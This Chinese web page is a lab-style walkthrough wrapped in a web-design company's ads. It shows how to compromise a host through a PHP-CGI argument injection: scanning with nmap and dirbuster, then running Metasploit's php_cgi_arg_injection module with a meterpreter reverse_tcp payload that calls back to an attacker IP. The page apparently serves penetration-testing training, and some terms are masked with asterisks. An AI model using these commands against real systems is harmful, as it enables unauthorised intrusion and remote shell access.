Metasploit溢出phpMyAdmin漏洞-创新互联-成都创新互联网站建设

关于创新互联

多方位宣传企业产品与服务 突出企业形象

公司简介 公司的服务 荣誉资质 新闻动态 联系我们

Metasploit溢出phpMyAdmin漏洞-创新互联

    利用phpMyAdmin漏洞上传***程序,获得webshell。

成都创新互联专注于企业营销型网站、网站重做改版、嫩江网站定制设计、自适应品牌网站建设、H5网站设计商城网站制作、集团公司官网建设、成都外贸网站建设公司、高端网站制作、响应式网页设计等建站业务,价格优惠性价比高,为嫩江等各大城市提供网站开发制作服务。

    CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程***者在请求参数中插入执行命令。

一、利用nmap工具扫描目标主机

1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。

1.2在终端中输入命令“nmap –sV  192.168.1.3”,对目标主机进行端口扫描,发现开放80端口。

Metasploit溢出phpMyAdmin漏洞

1.3在浏览器地址栏中输入“http:\\192.168.1.3”,访问目标网站。

二、利用dirbuster扫描目标主机

2.1在终端中输入命令“dirbuster”,启动软件对目标网站进行扫描。

2.2在Target URL处输入“192.168.1.3”,在File with list of dirs./file处选择字典文件(/usr/share/dirbuster/wordlists/目录下),单击“Start”按钮,开始扫描。

Metasploit溢出phpMyAdmin漏洞

2.3扫描结果显示包含cgi-bin目录、phpmyadmin目录等。

Metasploit溢出phpMyAdmin漏洞

三、利用metasploit***目标主机

3.1在终端中输入命令“msfconsole”,启动MSF终端。

3.2在终端中输入命令“search php_cgi”,搜索php_cgi的相关工具和***载荷。

3.3在终端中输入命令“use exploit/multi/http/php_cgi_arg_injection”,启用漏洞利用模块, 提示符就会提示进入到该路径下。

Metasploit溢出phpMyAdmin漏洞

3.4在终端中输入命令“show payloads”,显示Metasploit中可以在远程主机执行的代码,即shellcode。

3.5在终端中输入命令“set PAYLOAD php/meterpreter/reverse_tcp”,设置使用的shellcode代码。

3.6在终端中输入“show options”,显示***模块需要设置的参数。

3.7在终端中输入“set LHOST 192.168.1.2”,设置源主机的IP地址,用于会话的反向链接。

3.8在终端中输入“set RHOST 192.168.1.3”,设置目标主机的IP。

Metasploit溢出phpMyAdmin漏洞

Metasploit溢出phpMyAdmin漏洞

3.9在终端中输入“exploit”,开始对目标主机进行***。

Metasploit溢出phpMyAdmin漏洞

3.10在终端中输入“sysinfo”,查看系统环境信息。

3.11在终端中输入“ls”,显示当前目录下的文件内容。

Metasploit溢出phpMyAdmin漏洞

3.12在终端中输入“cat phpinfo.php”,查看文件内容。

Metasploit溢出phpMyAdmin漏洞

另外有需要云服务器可以了解下创新互联cdcxhl.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


网站栏目:Metasploit溢出phpMyAdmin漏洞-创新互联
文章URL:http://kswsj.cn/article/ccsohs.html

其他资讯